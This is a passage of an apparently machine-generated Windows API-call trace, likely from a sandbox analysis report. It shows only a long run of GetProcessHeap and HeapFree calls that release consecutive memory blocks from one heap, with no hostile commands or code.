HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290930 | out: hHeap=0x270000) returned 1 [0202.713] GetProcessHeap () returned 0x270000 [0202.713] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290950 | out: hHeap=0x270000) returned 1 [0202.713] GetProcessHeap () returned 0x270000 [0202.713] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290970 | out: hHeap=0x270000) returned 1 [0202.713] GetProcessHeap () returned 0x270000 [0202.713] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290990 | out: hHeap=0x270000) returned 1 [0202.713] GetProcessHeap () returned 0x270000 [0202.713] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2909b0 | out: hHeap=0x270000) returned 1 [0202.713] GetProcessHeap () returned 0x270000 [0202.713] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2909d0 | out: hHeap=0x270000) returned 1 [0202.713] GetProcessHeap () returned 0x270000 [0202.713] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2909f0 | out: hHeap=0x270000) returned 1 [0202.713] GetProcessHeap () returned 0x270000 [0202.713] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290a10 | out: hHeap=0x270000) returned 1 [0202.713] GetProcessHeap () returned 0x270000 [0202.714] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290a30 | out: hHeap=0x270000) returned 1 [0202.714] GetProcessHeap () returned 0x270000 [0202.714] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290a50 | out: hHeap=0x270000) returned 1 [0202.714] GetProcessHeap () returned 0x270000 [0202.714] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290a70 | out: hHeap=0x270000) returned 1 [0202.714] GetProcessHeap () returned 0x270000 [0202.714] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290a90 | out: hHeap=0x270000) returned 1 [0202.714] GetProcessHeap () returned 0x270000 [0202.714] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290ab0 | out: hHeap=0x270000) returned 1 [0202.714] GetProcessHeap () returned 0x270000 [0202.714] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290ad0 | out: hHeap=0x270000) returned 1 [0202.714] GetProcessHeap () returned 0x270000 [0202.714] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290af0 | out: hHeap=0x270000) returned 1 [0202.714] GetProcessHeap () returned 0x270000 [0202.714] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290b10 | out: hHeap=0x270000) returned 1 [0202.714] GetProcessHeap () returned 0x270000 [0202.714] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290b30 | out: hHeap=0x270000) returned 1 [0202.714] GetProcessHeap () returned 0x270000 [0202.714] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290b50 | out: hHeap=0x270000) returned 1 [0202.714] GetProcessHeap () returned 0x270000 [0202.714] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290b70 | out: hHeap=0x270000) returned 1 [0202.714] GetProcessHeap () returned 0x270000 [0202.714] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290b90 | out: hHeap=0x270000) returned 1 [0202.714] GetProcessHeap () returned 0x270000 [0202.714] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290bb0 | out: hHeap=0x270000) returned 1 [0202.714] GetProcessHeap () returned 0x270000 [0202.714] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290bd0 | out: hHeap=0x270000) returned 1 [0202.714] GetProcessHeap () returned 0x270000 [0202.714] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290bf0 | out: hHeap=0x270000) returned 1 [0202.714] GetProcessHeap () returned 0x270000 [0202.714] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290c10 | out: hHeap=0x270000) returned 1 [0202.714] GetProcessHeap () returned 0x270000 [0202.714] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290c30 | out: hHeap=0x270000) returned 1 [0202.714] GetProcessHeap () returned 0x270000 [0202.715] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290c50 | out: hHeap=0x270000) returned 1 [0202.715] GetProcessHeap () returned 0x270000 [0202.715] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290c70 | out: hHeap=0x270000) returned 1 [0202.715] GetProcessHeap () returned 0x270000 [0202.715] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290c90 | out: hHeap=0x270000) returned 1 [0202.715] GetProcessHeap () returned 0x270000 [0202.715] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290cb0 | out: hHeap=0x270000) returned 1 [0202.715] GetProcessHeap () returned 0x270000 [0202.715] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290cd0 | out: hHeap=0x270000) returned 1 [0202.715] GetProcessHeap () returned 0x270000 [0202.715] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290cf0 | out: hHeap=0x270000) returned 1 [0202.715] GetProcessHeap () returned 0x270000 [0202.715] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290d10 | out: hHeap=0x270000) returned 1 [0202.715] GetProcessHeap () returned 0x270000 [0202.715] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290d30 | out: hHeap=0x270000) returned 1 [0202.715] GetProcessHeap () returned 0x270000 [0202.715] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290d50 | out: hHeap=0x270000) returned 1 [0202.715] GetProcessHeap () returned 0x270000 [0202.715] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290d70 | out: hHeap=0x270000) returned 1 [0202.715] GetProcessHeap () returned 0x270000 [0202.715] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290d90 | out: hHeap=0x270000) returned 1 [0202.715] GetProcessHeap () returned 0x270000 [0202.715] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290db0 | out: hHeap=0x270000) returned 1 [0202.715] GetProcessHeap () returned 0x270000 [0202.715] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290dd0 | out: hHeap=0x270000) returned 1 [0202.715] GetProcessHeap () returned 0x270000 [0202.715] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290df0 | out: hHeap=0x270000) returned 1 [0202.715] GetProcessHeap () returned 0x270000 [0202.715] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290e10 | out: hHeap=0x270000) returned 1 [0202.715] GetProcessHeap () returned 0x270000 [0202.715] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290e30 | out: hHeap=0x270000) returned 1 [0202.715] GetProcessHeap () returned 0x270000 [0202.715] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290e50 | out: hHeap=0x270000) returned 1 [0202.716] GetProcessHeap () returned 0x270000 [0202.716] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290e70 | out: hHeap=0x270000) returned 1 [0202.716] GetProcessHeap () returned 0x270000 [0202.716] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290e90 | out: hHeap=0x270000) returned 1 [0202.716] GetProcessHeap () returned 0x270000 [0202.716] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290eb0 | out: hHeap=0x270000) returned 1 [0202.716] GetProcessHeap () returned 0x270000 [0202.716] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290ed0 | out: hHeap=0x270000) returned 1 [0202.716] GetProcessHeap () returned 0x270000 [0202.716] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290ef0 | out: hHeap=0x270000) returned 1 [0202.716] GetProcessHeap () returned 0x270000 [0202.716] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290f10 | out: hHeap=0x270000) returned 1 [0202.716] GetProcessHeap () returned 0x270000 [0202.716] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290f30 | out: hHeap=0x270000) returned 1 [0202.716] GetProcessHeap () returned 0x270000 [0202.716] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290f50 | out: hHeap=0x270000) returned 1 [0202.716] GetProcessHeap () returned 0x270000 [0202.716] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290f70 | out: hHeap=0x270000) returned 1 [0202.716] GetProcessHeap () returned 0x270000 [0202.716] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290f90 | out: hHeap=0x270000) returned 1 [0202.716] GetProcessHeap () returned 0x270000 [0202.716] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290fb0 | out: hHeap=0x270000) returned 1 [0202.716] GetProcessHeap () returned 0x270000 [0202.716] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290fd0 | out: hHeap=0x270000) returned 1 [0202.716] GetProcessHeap () returned 0x270000 [0202.716] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x290ff0 | out: hHeap=0x270000) returned 1 [0202.716] GetProcessHeap () returned 0x270000 [0202.716] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291010 | out: hHeap=0x270000) returned 1 [0202.716] GetProcessHeap () returned 0x270000 [0202.716] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291030 | out: hHeap=0x270000) returned 1 [0202.716] GetProcessHeap () returned 0x270000 [0202.717] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291090 | out: hHeap=0x270000) returned 1 [0202.717] GetProcessHeap () returned 0x270000 [0202.717] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2910b0 | out: hHeap=0x270000) returned 1 [0202.717] GetProcessHeap () returned 0x270000 [0202.717] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2910d0 | out: hHeap=0x270000) returned 1 [0202.717] GetProcessHeap () returned 0x270000 [0202.717] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2910f0 | out: hHeap=0x270000) returned 1 [0202.717] GetProcessHeap () returned 0x270000 [0202.717] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291110 | out: hHeap=0x270000) returned 1 [0202.717] GetProcessHeap () returned 0x270000 [0202.717] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291130 | out: hHeap=0x270000) returned 1 [0202.717] GetProcessHeap () returned 0x270000 [0202.717] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291150 | out: hHeap=0x270000) returned 1 [0202.717] GetProcessHeap () returned 0x270000 [0202.717] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291170 | out: hHeap=0x270000) returned 1 [0202.717] GetProcessHeap () returned 0x270000 [0202.717] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291190 | out: hHeap=0x270000) returned 1 [0202.717] GetProcessHeap () returned 0x270000 [0202.717] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2911b0 | out: hHeap=0x270000) returned 1 [0202.717] GetProcessHeap () returned 0x270000 [0202.717] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2911d0 | out: hHeap=0x270000) returned 1 [0202.717] GetProcessHeap () returned 0x270000 [0202.717] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2911f0 | out: hHeap=0x270000) returned 1 [0202.717] GetProcessHeap () returned 0x270000 [0202.717] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291210 | out: hHeap=0x270000) returned 1 [0202.717] GetProcessHeap () returned 0x270000 [0202.717] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291230 | out: hHeap=0x270000) returned 1 [0202.717] GetProcessHeap () returned 0x270000 [0202.717] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291250 | out: hHeap=0x270000) returned 1 [0202.717] GetProcessHeap () returned 0x270000 [0202.717] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291270 | out: hHeap=0x270000) returned 1 [0202.717] GetProcessHeap () returned 0x270000 [0202.717] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291290 | out: hHeap=0x270000) returned 1 [0202.718] GetProcessHeap () returned 0x270000 [0202.718] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2912b0 | out: hHeap=0x270000) returned 1 [0202.718] GetProcessHeap () returned 0x270000 [0202.718] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2912d0 | out: hHeap=0x270000) returned 1 [0202.718] GetProcessHeap () returned 0x270000 [0202.718] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2912f0 | out: hHeap=0x270000) returned 1 [0202.718] GetProcessHeap () returned 0x270000 [0202.718] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291310 | out: hHeap=0x270000) returned 1 [0202.718] GetProcessHeap () returned 0x270000 [0202.718] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291330 | out: hHeap=0x270000) returned 1 [0202.718] GetProcessHeap () returned 0x270000 [0202.718] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291350 | out: hHeap=0x270000) returned 1 [0202.718] GetProcessHeap () returned 0x270000 [0202.718] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291370 | out: hHeap=0x270000) returned 1 [0202.718] GetProcessHeap () returned 0x270000 [0202.718] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291390 | out: hHeap=0x270000) returned 1 [0202.718] GetProcessHeap () returned 0x270000 [0202.718] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2913b0 | out: hHeap=0x270000) returned 1 [0202.718] GetProcessHeap () returned 0x270000 [0202.718] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2913d0 | out: hHeap=0x270000) returned 1 [0202.718] GetProcessHeap () returned 0x270000 [0202.718] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2913f0 | out: hHeap=0x270000) returned 1 [0202.718] GetProcessHeap () returned 0x270000 [0202.718] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291410 | out: hHeap=0x270000) returned 1 [0202.718] GetProcessHeap () returned 0x270000 [0202.718] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291430 | out: hHeap=0x270000) returned 1 [0202.718] GetProcessHeap () returned 0x270000 [0202.718] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291450 | out: hHeap=0x270000) returned 1 [0202.718] GetProcessHeap () returned 0x270000 [0202.718] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291470 | out: hHeap=0x270000) returned 1 [0202.718] GetProcessHeap () returned 0x270000 [0202.718] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291490 | out: hHeap=0x270000) returned 1 [0202.718] GetProcessHeap () returned 0x270000 [0202.719] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2914b0 | out: hHeap=0x270000) returned 1 [0202.719] GetProcessHeap () returned 0x270000 [0202.719] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2914d0 | out: hHeap=0x270000) returned 1 [0202.719] GetProcessHeap () returned 0x270000 [0202.719] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2914f0 | out: hHeap=0x270000) returned 1 [0202.719] GetProcessHeap () returned 0x270000 [0202.719] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291510 | out: hHeap=0x270000) returned 1 [0202.719] GetProcessHeap () returned 0x270000 [0202.719] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291530 | out: hHeap=0x270000) returned 1 [0202.719] GetProcessHeap () returned 0x270000 [0202.719] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291550 | out: hHeap=0x270000) returned 1 [0202.719] GetProcessHeap () returned 0x270000 [0202.719] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291570 | out: hHeap=0x270000) returned 1 [0202.719] GetProcessHeap () returned 0x270000 [0202.719] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291590 | out: hHeap=0x270000) returned 1 [0202.719] GetProcessHeap () returned 0x270000 [0202.719] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2915b0 | out: hHeap=0x270000) returned 1 [0202.719] GetProcessHeap () returned 0x270000 [0202.719] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2915d0 | out: hHeap=0x270000) returned 1 [0202.719] GetProcessHeap () returned 0x270000 [0202.719] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2915f0 | out: hHeap=0x270000) returned 1 [0202.719] GetProcessHeap () returned 0x270000 [0202.719] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291610 | out: hHeap=0x270000) returned 1 [0202.719] GetProcessHeap () returned 0x270000 [0202.719] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291630 | out: hHeap=0x270000) returned 1 [0202.719] GetProcessHeap () returned 0x270000 [0202.719] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291650 | out: hHeap=0x270000) returned 1 [0202.719] GetProcessHeap () returned 0x270000 [0202.719] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291670 | out: hHeap=0x270000) returned 1 [0202.719] GetProcessHeap () returned 0x270000 [0202.719] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291690 | out: hHeap=0x270000) returned 1 [0202.719] GetProcessHeap () returned 0x270000 [0202.719] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2916b0 | out: hHeap=0x270000) returned 1 [0202.719] GetProcessHeap () returned 0x270000 [0202.720] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2916d0 | out: hHeap=0x270000) returned 1 [0202.720] GetProcessHeap () returned 0x270000 [0202.720] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2916f0 | out: hHeap=0x270000) returned 1 [0202.720] GetProcessHeap () returned 0x270000 [0202.720] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291710 | out: hHeap=0x270000) returned 1 [0202.720] GetProcessHeap () returned 0x270000 [0202.720] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291730 | out: hHeap=0x270000) returned 1 [0202.720] GetProcessHeap () returned 0x270000 [0202.720] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291750 | out: hHeap=0x270000) returned 1 [0202.720] GetProcessHeap () returned 0x270000 [0202.720] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291770 | out: hHeap=0x270000) returned 1 [0202.720] GetProcessHeap () returned 0x270000 [0202.720] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291790 | out: hHeap=0x270000) returned 1 [0202.720] GetProcessHeap () returned 0x270000 [0202.720] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2917b0 | out: hHeap=0x270000) returned 1 [0202.720] GetProcessHeap () returned 0x270000 [0202.720] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2917d0 | out: hHeap=0x270000) returned 1 [0202.720] GetProcessHeap () returned 0x270000 [0202.720] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2917f0 | out: hHeap=0x270000) returned 1 [0202.720] GetProcessHeap () returned 0x270000 [0202.720] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291810 | out: hHeap=0x270000) returned 1 [0202.720] GetProcessHeap () returned 0x270000 [0202.720] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291830 | out: hHeap=0x270000) returned 1 [0202.720] GetProcessHeap () returned 0x270000 [0202.720] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291890 | out: hHeap=0x270000) returned 1 [0202.720] GetProcessHeap () returned 0x270000 [0202.720] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2918b0 | out: hHeap=0x270000) returned 1 [0202.720] GetProcessHeap () returned 0x270000 [0202.720] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2918d0 | out: hHeap=0x270000) returned 1 [0202.720] GetProcessHeap () returned 0x270000 [0202.720] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2918f0 | out: hHeap=0x270000) returned 1 [0202.720] GetProcessHeap () returned 0x270000 [0202.720] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291910 | out: hHeap=0x270000) returned 1 [0202.721] GetProcessHeap () returned 0x270000 [0202.721] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291930 | out: hHeap=0x270000) returned 1 [0202.721] GetProcessHeap () returned 0x270000 [0202.721] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291950 | out: hHeap=0x270000) returned 1 [0202.721] GetProcessHeap () returned 0x270000 [0202.721] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291970 | out: hHeap=0x270000) returned 1 [0202.721] GetProcessHeap () returned 0x270000 [0202.721] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291990 | out: hHeap=0x270000) returned 1 [0202.721] GetProcessHeap () returned 0x270000 [0202.721] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2919b0 | out: hHeap=0x270000) returned 1 [0202.721] GetProcessHeap () returned 0x270000 [0202.721] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2919d0 | out: hHeap=0x270000) returned 1 [0202.721] GetProcessHeap () returned 0x270000 [0202.721] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2919f0 | out: hHeap=0x270000) returned 1 [0202.721] GetProcessHeap () returned 0x270000 [0202.721] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291a10 | out: hHeap=0x270000) returned 1 [0202.721] GetProcessHeap () returned 0x270000 [0202.721] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291a30 | out: hHeap=0x270000) returned 1 [0202.721] GetProcessHeap () returned 0x270000 [0202.721] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291a50 | out: hHeap=0x270000) returned 1 [0202.721] GetProcessHeap () returned 0x270000 [0202.721] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291a70 | out: hHeap=0x270000) returned 1 [0202.721] GetProcessHeap () returned 0x270000 [0202.721] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291a90 | out: hHeap=0x270000) returned 1 [0202.721] GetProcessHeap () returned 0x270000 [0202.721] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291ab0 | out: hHeap=0x270000) returned 1 [0202.721] GetProcessHeap () returned 0x270000 [0202.721] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291ad0 | out: hHeap=0x270000) returned 1 [0202.721] GetProcessHeap () returned 0x270000 [0202.721] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291af0 | out: hHeap=0x270000) returned 1 [0202.721] GetProcessHeap () returned 0x270000 [0202.721] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291b10 | out: hHeap=0x270000) returned 1 [0202.721] GetProcessHeap () returned 0x270000 [0202.722] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291b30 | out: hHeap=0x270000) returned 1 [0202.722] GetProcessHeap () returned 0x270000 [0202.722] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291b50 | out: hHeap=0x270000) returned 1 [0202.722] GetProcessHeap () returned 0x270000 [0202.722] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291b70 | out: hHeap=0x270000) returned 1 [0202.722] GetProcessHeap () returned 0x270000 [0202.722] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291b90 | out: hHeap=0x270000) returned 1 [0202.722] GetProcessHeap () returned 0x270000 [0202.722] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291bb0 | out: hHeap=0x270000) returned 1 [0202.722] GetProcessHeap () returned 0x270000 [0202.722] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291bd0 | out: hHeap=0x270000) returned 1 [0202.722] GetProcessHeap () returned 0x270000 [0202.722] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291bf0 | out: hHeap=0x270000) returned 1 [0202.722] GetProcessHeap () returned 0x270000 [0202.722] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291c10 | out: hHeap=0x270000) returned 1 [0202.722] GetProcessHeap () returned 0x270000 [0202.722] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291c30 | out: hHeap=0x270000) returned 1 [0202.722] GetProcessHeap () returned 0x270000 [0202.722] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291c50 | out: hHeap=0x270000) returned 1 [0202.722] GetProcessHeap () returned 0x270000 [0202.722] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291c70 | out: hHeap=0x270000) returned 1 [0202.722] GetProcessHeap () returned 0x270000 [0202.722] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291c90 | out: hHeap=0x270000) returned 1 [0202.722] GetProcessHeap () returned 0x270000 [0202.722] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291cb0 | out: hHeap=0x270000) returned 1 [0202.722] GetProcessHeap () returned 0x270000 [0202.722] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291cd0 | out: hHeap=0x270000) returned 1 [0202.722] GetProcessHeap () returned 0x270000 [0202.722] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291cf0 | out: hHeap=0x270000) returned 1 [0202.722] GetProcessHeap () returned 0x270000 [0202.722] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291d10 | out: hHeap=0x270000) returned 1 [0202.722] GetProcessHeap () returned 0x270000 [0202.723] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291d30 | out: hHeap=0x270000) returned 1 [0202.723] GetProcessHeap () returned 0x270000 [0202.723] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291d50 | out: hHeap=0x270000) returned 1 [0202.723] GetProcessHeap () returned 0x270000 [0202.723] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291d70 | out: hHeap=0x270000) returned 1 [0202.723] GetProcessHeap () returned 0x270000 [0202.723] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291d90 | out: hHeap=0x270000) returned 1 [0202.723] GetProcessHeap () returned 0x270000 [0202.723] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291db0 | out: hHeap=0x270000) returned 1 [0202.723] GetProcessHeap () returned 0x270000 [0202.723] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291dd0 | out: hHeap=0x270000) returned 1 [0202.723] GetProcessHeap () returned 0x270000 [0202.723] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291df0 | out: hHeap=0x270000) returned 1 [0202.723] GetProcessHeap () returned 0x270000 [0202.723] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291e10 | out: hHeap=0x270000) returned 1 [0202.723] GetProcessHeap () returned 0x270000 [0202.723] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291e30 | out: hHeap=0x270000) returned 1 [0202.723] GetProcessHeap () returned 0x270000 [0202.723] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291e50 | out: hHeap=0x270000) returned 1 [0202.723] GetProcessHeap () returned 0x270000 [0202.723] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291e70 | out: hHeap=0x270000) returned 1 [0202.723] GetProcessHeap () returned 0x270000 [0202.723] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291e90 | out: hHeap=0x270000) returned 1 [0202.723] GetProcessHeap () returned 0x270000 [0202.723] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291eb0 | out: hHeap=0x270000) returned 1 [0202.723] GetProcessHeap () returned 0x270000 [0202.723] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291ed0 | out: hHeap=0x270000) returned 1 [0202.723] GetProcessHeap () returned 0x270000 [0202.723] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291ef0 | out: hHeap=0x270000) returned 1 [0202.723] GetProcessHeap () returned 0x270000 [0202.723] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291f10 | out: hHeap=0x270000) returned 1 [0202.724] GetProcessHeap () returned 0x270000 [0202.724] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291f30 | out: hHeap=0x270000) returned 1 [0202.724] GetProcessHeap () returned 0x270000 [0202.724] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x291f50 | out: hHeap=0x270000) returned 1 [0202.724] GetProcessHeap () returned 0x270000 [0202.724] HeapFree (in: hHeap=0x270000, 